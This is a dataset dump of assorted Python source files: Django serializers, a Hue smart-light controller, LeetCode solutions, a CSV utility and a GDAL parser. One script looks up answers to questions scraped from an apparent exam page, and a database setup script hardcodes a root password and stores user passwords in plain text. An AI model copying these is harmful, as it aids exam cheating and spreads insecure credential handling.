\" Id Mth(participant): \",prtmethod[\"ac\"],\"\\t\",prtmethod[\"label\"])\n\n if interaction.ptolist is not None and len(interaction.ptolist) > 0:\n print( \" Participants:\" )\n for pto in interaction.ptolist:\n print( pto )\n #print( \" ------\" )\n #print( \" \",pto.interactor.pxref[\"ac\"],\"\\t\", pto.interactor.label,pto.interactor.name )\n #print( \" type: \", pto.interactor.type[\"label\"] )\n #print( \" role: \", pto.erole[0][\"label\"] )\n #print( \" ------\" ) \n\n print( \" =======\" )\n\n\n","sub_path":"script/mif-read.py","file_name":"mif-read.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"405349063","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom drf_writable_nested import WritableNestedModelSerializer\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom api.serializers.producers import ProducerSerializer\nfrom competitions.models import Competition, Phase, Submission, CompetitionParticipant\n\n\nclass CompetitionParticipantSerializer(serializers.ModelSerializer):\n class Meta:\n model = CompetitionParticipant\n fields = ('competition', 'user')\n\n\nclass PhaseSerializer(WritableNestedModelSerializer):\n class Meta:\n model = Phase\n fields = (\n 'id',\n # 'competition',\n 'index',\n 'start',\n 'end',\n 'name',\n 'description',\n 'is_active',\n )\n\n\nclass SubmissionSerializer(serializers.ModelSerializer):\n competition = serializers.IntegerField(min_value=1, write_only=True, required=True)\n phase_index = serializers.IntegerField(min_value=1, write_only=True, required=True)\n\n class Meta:\n model = Submission\n fields = (\n 'remote_id',\n 'competition', # on write only\n 'phase_index', # on write this is the phase index within the competition, NOT a PK\n 'submitted_at',\n 'participant',\n )\n\n def validate(self, attrs):\n competition = Competition.objects.get(\n remote_id=attrs.pop('competition'),\n producer=self.context.get('producer')\n )\n attrs['phase'] = competition.phases.get(index=attrs.pop('phase_index'))\n return attrs\n\n def create(self, validated_data):\n instance, _ = Submission.objects.update_or_create(\n remote_id=validated_data.pop('remote_id'),\n phase=validated_data.pop('phase'),\n defaults=validated_data\n )\n return instance\n\n\nclass CompetitionSerializer(WritableNestedModelSerializer):\n # Stop the \"uniqueness\" validation, we want to be able to 
update already\n    # existing models\n    # Also, Producer in this case comes from serializer context\n    producer = ProducerSerializer(required=False, validators=[])\n    phases = PhaseSerializer(required=False, many=True)\n    participants = CompetitionParticipantSerializer(many=True, read_only=True)\n    admins = serializers.StringRelatedField(many=True, read_only=True)\n\n    class Meta:\n        model = Competition\n        fields = (\n            'id',\n            'remote_id',\n            'title',\n            'producer',\n            'created_by',\n            'start',\n            'logo',\n            'url',\n            'phases',\n            'participants',\n            'description',\n            'end',\n            'admins',\n            'is_active',\n            # 'get_active_phase_end',\n            'participant_count',\n            'html_text',\n            'current_phase_deadline',\n            'prize',\n            'published'\n        )\n        validators = []\n        extra_kwargs = {\n            'producer': {\n                # UniqueTogether validator messes this up\n                'validators': [],\n            }\n        }\n\n    def validate_description(self, description):\n        if description:\n            description = description.replace(\"\\r\\n\\r\\n    \", \"\").replace(\"\\r\\n\\r\\n
    \", \"\")\n return description\n\n def validate_producer(self, producer):\n context_producer = self.context.get(producer)\n if context_producer:\n return context_producer\n\n if not producer:\n raise ValidationError(\"Producer not found when creating data entry\")\n return producer\n\n def create(self, validated_data):\n try:\n temp_instance = Competition.objects.get(\n remote_id=validated_data.get('remote_id'),\n producer__id=self.context['producer'].id\n )\n except ObjectDoesNotExist:\n temp_instance = None\n # If we have an existing instance from this producer\n # with the same remote_id, update it instead of making a new one\n if temp_instance:\n return self.update(temp_instance, validated_data)\n else:\n new_instance = super(CompetitionSerializer, self).create(validated_data)\n new_instance.producer = self.context['producer']\n new_instance.save()\n return new_instance","sub_path":"src/apps/api/serializers/competitions.py","file_name":"competitions.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647775246","text":"import tkinter\n\nroot = tkinter.Tk()\nroot.title(\"Music Player\")\nimg = tkinter.PhotoImage(file=\"audio.png\")\nroot.iconphoto(root, img)\n\nwidth = 1366 // 2\nheight = 763 // 2\nx = 1366 // 4\ny = 763 // 4\nroot.geometry(f\"{width}x{height}+{x}+{y}\")\nroot.resizable(False, False)\nroot.mainloop()\n","sub_path":"Projects/Music Player/Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"323730681","text":"import csv\ndef getonedom(mail:str):\n x = mail.partition('@')\n dom = x[2]\n return dom.lower()\n\n\ndef getDomains(fpath):\n listdom = []\n with open(fpath) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n temph = getonedom(row[1])\n vool = temph in listdom\n if vool == False:\n listdom.append(temph)\n \n return listdom\n\ndef getAverages(fpath):\n countT = 0\n results = dict()\n lisdom = getDomains(fpath)\n results = dict.fromkeys(lisdom,0)\n for i in lisdom:\n numl = []\n domstr = lisdom[countT]\n countT += 1\n with open(fpath) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if getonedom(row[1]) == domstr:\n numl.append(int(row[2]))\n actual_average = round(sum(numl)/(len(numl)),2)\n results[domstr] = actual_average\n\n\n return results\n \n\nif __name__ == \"__main__\":\n# print(getAverages('MOCK_DATA.csv'))\n print(getAverages('Practica4TData.csv')) \n # print(getDomains('Practica4TData.csv'))\n","sub_path":"ago-dic-2020/Jesus Antonio Gonzalez Cardenas/Practica4/Practica4.py","file_name":"Practica4.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"283170633","text":"# coding=utf-8\n# Version:python 3.7.0\n# Tools:Pycharm 2020.2\n\nimport pandas as pd\nfrom pandas import read_excel\nimport xlrd\n_date_ = '2020/12/11 14:13'\n_author_ = 'Lewis'\n\nimport re\nimport os\nimport csv\n\ndef GetAnswer(question):\n excel_file = r'副本12.16更新形势与政策必答题库(不完整).xlsx'\n data = pd.read_excel(excel_file, index_col='题目')\n\n # 这个的index_col就是index,可以选择任意字段作为索引index,读入数据\n # answer = '无答案'\n\n try:\n answer = data.loc[question]['答案']\n # print(data.loc[question])\n\n print(\"答案 : \"+str(answer))\n return str(answer)\n except KeyError:\n print('无答案')\n return '无答案'\n\n# name = 
\"选答自测2\" # 这里自己输入文件名字,例如我们要处理ab.txt文件,此处name = \"ab\", 该写法需要将txt文件和该脚本放在同一目录下\n# name = \"必答自测1\"\nname = \"考试系统\"\n# name = \"期末考试\"\ntxtName = name + \".html\"\ncsvName = name + \".csv\"\n\nfp = open(txtName, \"rb\") # 打开txt文本\na = fp.read() # 读取txt文本\nresult = re.findall(r'

    ([\\s\\S]*?)

    ', a.decode('utf-8')) # 正则匹配\nlist1 = [] # 该列表用于临时存储字符串\ncount = 1\nfor i in result: # 匹配到的内容逐条提取\n if i != '': # 过滤空白字符\n i = i.replace(\"(\", \"(\")\n i = i.replace(\")\", \")\")\n i = i.replace(\" \",\"\")\n i = i.strip()\n print(\"第 \"+str(count)+\" 题: \"+i) # 看匹配到的内容\n count += 1\n list1.append(i) # 将字符串添加到列表再写进去,不然字符会被拆开成一个一个\n # GetAnswer(i)\n answer = GetAnswer(i) # 获取题目的答案\n list1.append(',') # 添加逗号\n answer = answer.replace(u'\\xa0', u' ')\n list1.append(answer) # 添加答案 //答案里的\\xa0 是不间断空白符   需要用空格替换掉\n # 下面就是写入csv文件的功能了,newline=''可以避免空行问题\n with open(csvName, 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n\n writer.writerow(list1)\n list1.pop() # 写入完成要将列表中的字符串删除\n list1.pop()\n list1.pop()","sub_path":"查询本地题库/newMethod.py","file_name":"newMethod.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"79804915","text":"from Firefly import logging\n# from rgb_cie import Converter\nfrom Firefly.components.hue.ct_fade import CTFade\nfrom Firefly.components.virtual_devices import AUTHOR\nfrom Firefly.const import ACTION_LEVEL, ACTION_OFF, ACTION_ON, ACTION_TOGGLE, COMMAND_SET_LIGHT, COMMAND_UPDATE, DEVICE_TYPE_COLOR_LIGHT, EVENT_ACTION_OFF, LEVEL, STATE, SWITCH\nfrom Firefly.helpers.device import COLOR, COLOR_TEMPERATURE\nfrom Firefly.helpers.device_types.light import Light\nfrom Firefly.helpers.events import Command\nfrom Firefly.services.alexa.alexa_const import ALEXA_INTERFACE, ALEXA_LIGHT, ALEXA_POWER_INTERFACE, ALEXA_POWER_LEVEL_INTERFACE\nfrom Firefly.util.color import color_temperature_kelvin_to_mired, color_temperature_mired_to_kelvin, Colors, check_ct\n\nTITLE = 'Firefly Hue Device'\nDEVICE_TYPE = DEVICE_TYPE_COLOR_LIGHT\nAUTHOR = AUTHOR\nCOMMANDS = [ACTION_OFF, ACTION_ON, ACTION_TOGGLE, ACTION_LEVEL, COMMAND_SET_LIGHT, 'ct_fade']\nINITIAL_VALUES = {\n '_state': EVENT_ACTION_OFF,\n '_uniqueid': '-1',\n '_manufacturername': 'unknown',\n '_on': False,\n '_switch': 'off',\n '_hue': 0,\n '_sat': 0,\n '_effect': False,\n '_xy': 0,\n '_colormode': 'unknown',\n '_alert': False,\n '_bri': 0,\n '_reachable': False,\n '_type': 'unknown',\n '_ct': 0,\n '_level': 0,\n '_hue_noun': 'state',\n '_hue_service': 'service_hue',\n '_hue_number': -1\n}\n\nCAPABILITIES = {\n LEVEL: True,\n SWITCH: True,\n COMMAND_SET_LIGHT: True,\n COLOR: True,\n COLOR_TEMPERATURE: True\n}\n\n\nclass HueDevice(Light):\n def __init__(self, firefly, package, title, author, commands, requests, device_type, **kwargs):\n if not kwargs.get('initial_values'):\n kwargs['initial_values'] = INITIAL_VALUES\n else:\n # TODO: Remove hacky logic\n # INITIAL_VALUES.update(kwargs['initial_values'])\n kwargs['initial_values'] = INITIAL_VALUES\n if commands:\n c = set(commands)\n c.update(COMMANDS)\n commands = list(c)\n super().__init__(firefly, package, title, author, commands, requests, device_type, capabilities=CAPABILITIES, **kwargs)\n\n self.__dict__.update(kwargs['initial_values'])\n\n if self._alias == self.id:\n self._alias = kwargs.get('name')\n\n # TODO: Remove hue_bridge?\n self._hue_bridge = kwargs.get('hue_bridge')\n self._hue_service = kwargs.get('hue_service')\n\n # self.add_command(ACTION_OFF, self.off)\n # self.add_command(ACTION_ON, self.on)\n # self.add_command(ACTION_TOGGLE, self.toggle)\n self.add_command(COMMAND_UPDATE, self.update)\n # self.add_command(ACTION_LEVEL, self.set_level)\n # self.add_command(COMMAND_SET_LIGHT, self.setLight)\n self.add_command('ct_fade', self.set_ct_fade)\n\n # 
self.add_request(STATE, self.get_state)\n # self.add_request(LEVEL, self.get_level)\n\n # self.add_request(STATE, self.get_state)\n # self.add_request(SWITCH, self.get_state)\n\n # self.add_request('hue', self.get_hue)\n # self.add_request('sat', self.get_sat)\n # self.add_request('ct', self.get_ct)\n\n # self.add_action(SWITCH, action_on_off_switch())\n # self.add_action(LEVEL, action_dimmer())\n\n # self.add_alexa_action(ALEXA_OFF)\n # self.add_alexa_action(ALEXA_ON)\n # self.add_alexa_action(ALEXA_SET_PERCENTAGE)\n # self.add_alexa_action(ALEXA_SET_COLOR_TEMP)\n # self.add_alexa_action(ALEXA_SET_COLOR)\n\n self.add_alexa_categories(ALEXA_LIGHT)\n # TODO: Finish adding alexa types\n self.add_alexa_capabilities([ALEXA_INTERFACE, ALEXA_POWER_INTERFACE, ALEXA_POWER_LEVEL_INTERFACE])\n\n # TODO: Make HOMEKIT CONST\n self.add_homekit_export('HOMEKIT_COLOR_LIGHT', STATE)\n\n self._hue_noun = 'state' if self._package == 'Firefly.components.hue.hue_light' else 'action'\n\n if self._hue_noun == 'state':\n self._hue_type = 'light'\n else:\n self._hue_type = 'group'\n self._hue_number = kwargs.get('hue_number')\n\n self._name = kwargs.get('name')\n self._uniqueid = kwargs.get('uniqueid', '-1')\n self._manufacturername = kwargs.get('manufacturername', '')\n self._swversion = kwargs.get('swversion', '')\n self._modelid = kwargs.get('modelid', '')\n self._bri = 0\n self._ct_fade = None\n\n if kwargs.get(self.hue_noun):\n hue_device = kwargs.get(self.hue_noun)\n switch = hue_device.get('on')\n hue = hue_device.get('hue')\n sat = hue_device.get('sat')\n bri = hue_device.get('bri')\n ct = int(color_temperature_mired_to_kelvin(hue_device.get('ct', 2700)))\n level = int(bri / 255.0 * 100.0)\n self.update_values(level=level, switch=switch, hue=hue, sat=sat, bri=bri, ct=ct)\n\n # self._on = kwargs.get(self.hue_noun).get('on', False)\n # self._hue = kwargs.get(self.hue_noun).get('hue', 0)\n # self._sat = kwargs.get(self.hue_noun).get('sat', 0)\n self._effect = kwargs.get(self.hue_noun).get('effect', '')\n self._xy = kwargs.get(self.hue_noun).get('xy', 0)\n self._colormode = kwargs.get(self.hue_noun).get('colormode', '')\n self._alert = kwargs.get(self.hue_noun).get('alert', False)\n # self._bri = kwargs.get(self.hue_noun).get('bri', 0)\n self._reachable = kwargs.get(self.hue_noun).get('reachable', '-1')\n #self._ct = kwargs.get(self.hue_noun).get('ct', 0)\n\n # self._level = int(self._bri / 255.0 * 100.0)\n\n def update(self, **kwargs):\n self._name = kwargs.get('name')\n self._uniqueid = kwargs.get('uniqueid', '')\n self._manufacturername = kwargs.get('manufacturername', '')\n self._swversion = kwargs.get('swversion', '')\n self._modelid = kwargs.get('modelid', '')\n self._hue_service = kwargs.get('hue_service', 'service_hue')\n self._hue_number = kwargs.get('hue_number')\n\n if self._alias != self._name:\n self._alias = self._name\n self.firefly.aliases.set_alias(self.id, self._alias)\n\n if kwargs.get(self.hue_noun):\n hue_device = kwargs.get(self.hue_noun)\n switch = hue_device.get('on')\n hue = hue_device.get('hue')\n sat = hue_device.get('sat')\n bri = hue_device.get('bri')\n ct = int(color_temperature_mired_to_kelvin(hue_device.get('ct', 2700)))\n level = int(bri / 255.0 * 100.0)\n self.update_values(level=level, switch=switch, hue=hue, sat=sat, bri=bri, ct=ct)\n\n # self._on = kwargs.get(self.hue_noun).get('on')\n # self._hue = kwargs.get(self.hue_noun).get('hue')\n # self._sat = kwargs.get(self.hue_noun).get('sat')\n # self._effect = kwargs.get(self.hue_noun).get('effect')\n self._xy = 
kwargs.get(self.hue_noun).get('xy')\n self._colormode = kwargs.get(self.hue_noun).get('colormode')\n self._alert = kwargs.get(self.hue_noun).get('alert')\n # self._bri = kwargs.get(self.hue_noun).get('bri')\n self._reachable = kwargs.get(self.hue_noun).get('reachable')\n #self._ct = kwargs.get(self.hue_noun).get('ct')\n # self._level = int(self._bri / 255.0 * 100.0)\n\n @property\n def hue_noun(self):\n return self._hue_noun\n\n def set_light(self, switch=None, level=None, colors=Colors(), ct=None, **kwargs):\n logging.info('[HUE] VALUES SWITCH: %s LEVEL %s KWARGS %s' % (switch, level, str(kwargs)))\n\n value = kwargs\n hue_value = {}\n\n # TRANS TIME\n transitiontime = value.get('transitiontime')\n if transitiontime is not None:\n try:\n transitiontime = int(transitiontime)\n except:\n transitiontime = 20\n hue_value.update({\n 'transitiontime': transitiontime\n })\n else:\n transitiontime = 20\n #hue_value.update({\n # 'transitiontime': transitiontime\n #})\n\n # END FADE IF SET COMMAND IS GIVEN\n if not value.get('ct_fade', False):\n if self._ct_fade is not None:\n self._ct_fade.endRun()\n self._ct_fade = None\n\n if switch is not None:\n hue_value.update({\n 'on': switch == 'on'\n })\n self.update_values(switch=switch)\n\n if level is not None:\n bri = 0\n try:\n level = int(level)\n except:\n level = 100\n\n if level > 0:\n level = min(level, 100)\n bri = int(255.0 / 100.0 * level)\n hue_value.update({\n 'bri': bri,\n 'on': True\n })\n else:\n hue_value.update({\n 'bri': bri,\n 'on': False\n })\n self._bri = bri\n self.update_values(level=level)\n\n if colors.is_set:\n hue = int(colors.hue_expanded)\n sat = int(colors.sat_expanded)\n hue_value.update({\n 'hue': hue,\n 'sat': sat\n })\n self.update_values(hue=hue, sat=sat, bri=self._bri)\n\n if ct is not None:\n ct = check_ct(ct, kelvin=False)\n hue_value.update({\n 'ct': ct\n })\n self.update_values(ct=color_temperature_mired_to_kelvin(ct))\n\n logging.info('[HUE] HUE VALUE %s' % str(hue_value))\n self.set_hue_device(hue_value)\n\n\n '''\n def setLight(self, **kwargs):\n value = kwargs\n hue_value = {}\n\n # TODO: Remove This\n logging.info(value)\n\n # END FADE IF SET COMMAND IS GIVEN\n if not value.get('ct_fade', False):\n if self._ct_fade is not None:\n self._ct_fade.endRun()\n self._ct_fade = None\n\n # XY\n xy = value.get('xy')\n if xy is not None:\n hue_value.update({\n 'xy': xy\n })\n self._xy = xy\n\n # HUE\n hue = value.get('hue')\n if hue is not None:\n hue_value.update({\n 'hue': hue\n })\n self._hue = hue\n\n # TRANS TIME\n transitiontime = value.get('transitiontime')\n if transitiontime is not None:\n try:\n transitiontime = int(transitiontime)\n except:\n transitiontime = 40\n hue_value.update({\n 'transitiontime': transitiontime\n })\n\n ## NAME COLOR\n # name = value.get('name')\n # if name:\n # value['hex'] = name_to_hex(name)\n\n # HEX COLOR\n hexColor = value.get('hex')\n if hexColor is not None:\n hue_value.update(self.hexColor(hexColor))\n\n ## PRESET\n # preset = value.get('preset')\n # if preset:\n # if preset in PRESETS_CT:\n # value['ct'] = PRESETS_CT.get(preset)\n\n # SET FOR LEVEL\n level = value.get('level')\n if level is not None:\n try:\n level = int(level)\n except:\n level = 100\n\n if level > 0:\n level = min(level, 100)\n bri = int(255.0 / 100.0 * level)\n self._bri = bri\n self._on = True\n hue_value.update({\n 'bri': bri,\n 'on': True\n })\n else:\n bri = 0\n level = 0\n self._on = False\n hue_value.update({\n 'bri': bri,\n 'on': False\n })\n self._bri = bri\n self._level = level\n\n # SET FOR BRI\n 
bri = value.get('bri')\n if bri is not None:\n bri = min(bri, 255)\n if bri <= 0:\n bri = 0\n self._level = 0\n self._on = False\n hue_value.update({\n 'on': False\n })\n else:\n self._on = True\n self._level = int(bri / 255.0 * 100.0)\n hue_value.update({\n 'bri': bri,\n 'on': True\n })\n self._bri = bri\n\n # SET CT:\n ct = value.get('ct')\n if ct is not None:\n ct = check_ct(ct)\n hue_value.update({\n 'ct': ct\n })\n self._ct = ct\n\n # SET SAT:\n sat = value.get('sat')\n if sat is not None:\n try:\n sat = int(sat)\n sat = min(sat, 255)\n sat = max(sat, 0)\n hue_value.update({\n 'sat': sat\n })\n except:\n pass\n\n # EFFECT\n effect = value.get('effect')\n if effect is not None:\n hue_value.update({\n 'effect': effect\n })\n self._effect = effect\n\n # ALERT\n alert = value.get('alert')\n if alert is not None:\n hue_value.update({\n 'alert': alert\n })\n self._alert = alert\n\n # SET FOR ON\n on = value.get('on')\n if on is not None:\n if on:\n hue_value.update({\n 'on': on\n })\n else:\n hue_value.update({\n 'on': on\n })\n self._on = on\n\n switch = value.get('switch')\n if switch is not None:\n hue_value.update({\n 'on': switch == 'on'\n })\n self._on = switch == 'on'\n\n # Turn lights on unless told not to or has already been set\n if hue_value.get('on') is None and not value.get('no_on'):\n hue_value.update({\n 'on': True\n })\n self._on = True\n\n # Process special values from alexa\n alexa = value.get('alexa')\n if alexa is not None:\n hue = int(65535 / 360 * alexa.get('hue', 0))\n sat = int(alexa.get('saturation', 0) * 254)\n bri = int(alexa.get('brightness', 0) * 254)\n\n hue_value = {\n 'hue': hue,\n 'bri': bri,\n 'sat': sat\n }\n\n # TODO: Remove This\n logging.info(hue_value)\n self.set_hue_device(hue_value)\n return value\n '''\n\n def set_ct_fade(self, **kwargs):\n \"\"\"\n Set color temperature fade over time.\n\n Args:\n start_k: (str) Start color temp in k (2700k)\n end_k: (str) End color temp in k (2700k)\n start_level: (int) Start level\n end_level: (int) End Level\n\n Returns:\n None\n\n \"\"\"\n start_k = kwargs.get('start_k')\n end_k = kwargs.get('end_k')\n start_level = kwargs.get('start_level')\n end_level = kwargs.get('end_level')\n\n try:\n if 'K' in start_k.upper():\n start_k = int(start_k.upper().replace('K', ''))\n if 'K' in end_k.upper():\n end_k = int(end_k.upper().replace('K', ''))\n start_k = min(start_k, 6500)\n start_k = max(start_k, 2000)\n end_k = min(end_k, 6500)\n end_k = max(end_k, 2000)\n\n fade_sec = int(kwargs.get('fade_sec', 1500))\n if start_level is not None and end_level is not None:\n start_level = int(start_level)\n end_level = int(end_level)\n\n except:\n logging.error(code='FF.HUE.SET.002') # error parsing ct_fade\n return\n\n self._ct_fade = CTFade(self._firefly, str(self.id), start_k, end_k, fade_sec, start_level, end_level)\n\n def set_hue_device(self, value):\n path = '%ss/%s/%s' % (self._hue_type, self._hue_number, self._hue_noun)\n command = Command(self._hue_service, self.id, 'send_request', **{\n 'path': path,\n 'data': value,\n 'method': 'PUT'\n })\n self.firefly.send_command(command)\n\n def hexColor(self, colorHex):\n if '#' in colorHex:\n colorHex = colorHex.replace('#', '')\n if 'LST' in self._modelid:\n # TODO: Fix this\n return colorHex\n # return {'xy': converter.hexToCIE1931(colorHex, lightType='LST')}\n # return {'xy': 
converter.hexToCIE1931(colorHex)}\n\n","sub_path":"Firefly/components/hue/hue_device.py","file_name":"hue_device.py","file_ext":"py","file_size_in_byte":14627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"495766212","text":"# Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).\r\n#\n#\n# For example:\r\n# Given binary tree [3,9,20,null,null,15,7],\r\n#\n# 3\r\n# / \\\r\n# 9 20\r\n# / \\\r\n# 15 7\r\n#\n#\n#\n# return its bottom-up level order traversal as:\r\n#\n# [\r\n# [15,7],\r\n# [9,20],\r\n# [3]\r\n# ]\r\n#\n#\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:\n \"\"\"\n if not root:\n return []\n s = [root]\n \n res = [[root.val]]\n while s:\n each_level = []\n each_level_value = []\n \n while s:\n top = s.pop(0) # if pop() the rightmost will be popped out first\n \n if top.left:\n each_level.append(top.left)\n each_level_value.append(top.left.val)\n if top.right:\n each_level.append(top.right)\n each_level_value.append(top.right.val)\n s = each_level\n if each_level_value:\n res.append(each_level_value)\n \n rev_res = []\n while res:\n rev_res.append(res.pop())\n return rev_res\n \"\"\"\n \n if not root:\n return []\n \n ans = []\n each_level = [root]\n while each_level:\n ans.insert(0, [i.val for i in each_level]) # insert from front\n each_level = [j for i in each_level for j in (i.left, i.right) if j] # update each_level using next level\n return ans\n","sub_path":"solutions/0107-binary-tree-level-order-traversal-ii/binary-tree-level-order-traversal-ii.py","file_name":"binary-tree-level-order-traversal-ii.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"234652857","text":"import pymysql\r\nimport random \r\nimport pandas as pd\r\n\r\ndef reset():\r\n\r\n #随机生成银行卡号写入文件\r\n s='6217'\r\n card_num =[]\r\n flag= 20\r\n while flag:\r\n s='6217'\r\n for i in range(19):\r\n s = s+str(random.randint(0,10))\r\n if s not in card_num:\r\n card_num.append(s)\r\n flag = flag-1\r\n \r\n print(card_num)\r\n \r\n df = pd.read_excel('./data.xlsx',sheet_name='Sheet1')\r\n df['银行卡号'] = card_num\r\n pd.DataFrame(df).to_excel('data.xlsx', sheet_name='Sheet1', index=False, header=True)\r\n \r\n # 打开数据库\r\n db = pymysql.connect(host='localhost',port =3306,user='root',passwd='123456',db='scholarship',charset='utf8' )\r\n \r\n #使用cursor()方法获取操作游标\r\n cursor = db.cursor()\r\n \r\n SQL = \"\"\"CREATE DATABASE `scholarship`\"\"\"\r\n \r\n SQL1 = \"\"\"DROP TABLE IF EXISTS `stu_info`\"\"\"\r\n SQL2 = \"\"\"CREATE TABLE `stu_info` (\r\n `stu_id` varchar(32) NOT NULL COMMENT '学号',\r\n `stu_name` varchar(32) NOT NULL COMMENT '姓名',\r\n `stu_major` varchar(32) NOT NULL COMMENT '专业',\r\n `stu_class` varchar(32) NOT NULL COMMENT '班级',\r\n `card_num` varchar(32) NOT NULL COMMENT '银行卡号',\r\n `stu_scholarship` enum('是','否') NOT NULL COMMENT '奖学金有无',\r\n `stu_scholarship_status` enum('是','否') NOT NULL COMMENT '奖学金发放情况',\r\n PRIMARY KEY (`stu_id`)\r\n ) ENGINE=InnoDB DEFAULT CHARSET=UTF8MB4;\r\n \"\"\"\r\n cursor.execute(SQL1)\r\n cursor.execute(SQL2)\r\n #使用innodb引擎,数据库默认编码为utf-8\r\n # 创建插入SQL语句\r\n insert_sql = \"insert into stu_info values (%s, %s, %s, %s, %s, %s, %s);\"\r\n stu_data = 
pd.read_excel('./data.xlsx',sheet_name='Sheet1')\r\n # 创建一个for循环迭代读取xls文件每行数据的, 从第二行开始是要跳过标题\r\n for i in range(len(stu_data)):\r\n stu_id = str(stu_data.iloc[i,0])\r\n stu_name = str(stu_data.iloc[i,1])\r\n stu_major = str(stu_data.iloc[i,2])\r\n stu_class =str(stu_data.iloc[i,3])\r\n card_num = str(stu_data.iloc[i,4])\r\n stu_scholarship = str(stu_data.iloc[i,5])\r\n stu_scholarship_status = str(stu_data.iloc[i,6])\r\n values = (stu_id, stu_name, stu_major, stu_class, card_num, stu_scholarship, stu_scholarship_status)\r\n cursor.execute(insert_sql, values)\r\n cursor.connection.commit() \r\n \r\n SQL8 = \"\"\"DROP TABLE IF EXISTS `users`;\"\"\"\r\n SQL9 = \"\"\"CREATE TABLE `users` (\r\n `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '用户id',\r\n `user_name` varchar(32) NOT NULL COMMENT '用户名',\r\n `user_password` varchar(23) NOT NULL COMMENT '登录密码',\r\n PRIMARY KEY (`id`),\r\n UNIQUE KEY `user_name` (`user_name`)\r\n ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;\r\n \"\"\"\r\n cursor.execute(SQL8)\r\n cursor.execute(SQL9)\r\n \r\n #SQL10 = \"\"\"LOCK TABLES `users` WRITE;\"\"\"\r\n \r\n SQL11 = \"\"\"INSERT INTO `users` VALUES (1,'admin','123456'),(2,'momobaba','123456');\"\"\"\r\n cursor.execute(SQL11)\r\n cursor.connection.commit() \r\n \r\n #SQL12 = \"\"\"UNLOCK TABLES;\"\"\"\r\n \r\n db.close()\r\n \r\nif __name__ == '__main__':\r\n reset()","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647634505","text":"import os\n\n#helper function that makes our rgb value a list\ndef quantify(rgbaString):\n\trgba = rgbaString\n\tr_gba = rgba.partition(',')\n\tr\t = r_gba[0]\n\tgba\t = r_gba[2]\n\tg_ba = gba.partition(',')\n\tg\t = g_ba[0]\n\tba\t = g_ba[2]\n\tb_a\t = ba.partition(',')\n\tb\t = b_a[0]\n\trgbList = [int(r),int(g),int(b)]\n\treturn rgbList\n\n#Parse the color table from gdalinfo\ndef MakeDict():\n\tresult = os.popen(\"gdalinfo NDVIcut.tif\").read()\n\tpart \t = result.partition(\"256 entries)\")\n\tcolorTable = part[2]\n\tcolorTable = colorTable[:-49]\n\tcolorDict = {}\n\tcolorList = colorTable.splitlines()\n\n\t#make a dictionary of the color table\n\n\tfor line in colorList:\n\t\tif (line==\"\"):\n\t\t\tcontinue\n\t\tcolorParts = line.partition(': ')\t\n\t\tkeyString = colorParts[0].rpartition(' ')\n\t\tkey \t = int(keyString[2])\n\t\tvalue\t\t = quantify(colorParts[2])\t\n\t\tcolorDict[key] = value\n\t\n\treturn colorDict\n\nmyDict = MakeDict()\nprint(myDict)\n","sub_path":"scripts/DictMaker.py","file_name":"DictMaker.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"273064327","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'swiftses.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^genaccount/', include('genaccount.urls', namespace=\"genaccount\")),\n url(r'^admin/', include(admin.site.urls)),\n]\n\nadmin.site.site_title = 'Swiftses Administration'\nadmin.site.site_header = 'Swiftses administration'\n","sub_path":"swiftses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"46987962","text":"### 880. 
Decoded String at Index\n# Time complexity: O(N) where N = encoded string size\n# Space complexity: O(N) where N = encoded string size (O(1) if not count the input string)\nclass Solution: \n def decodeAtIndex(self, S, K):\n \"\"\"\n :type S: str\n :type K: int\n :rtype: str\n \"\"\"\n count = 0\n for s in S:\n count += (int(s)-1)*count if s.isdigit() else 1\n for s in S[::-1]:\n K = K%count\n if K == 0 and not s.isdigit(): return s\n if s.isdigit():\n count /= int(s)\n else:\n count -= 1\n","sub_path":"880/lc880-solution3.py","file_name":"lc880-solution3.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"314036780","text":"import FWCore.ParameterSet.Config as cms\n\nhltParticleFlowClusterHCALForEgamma = cms.EDProducer(\"PFMultiDepthClusterProducer\",\n clustersSource = cms.InputTag(\"hltParticleFlowClusterHBHEForEgamma\"),\n energyCorrector = 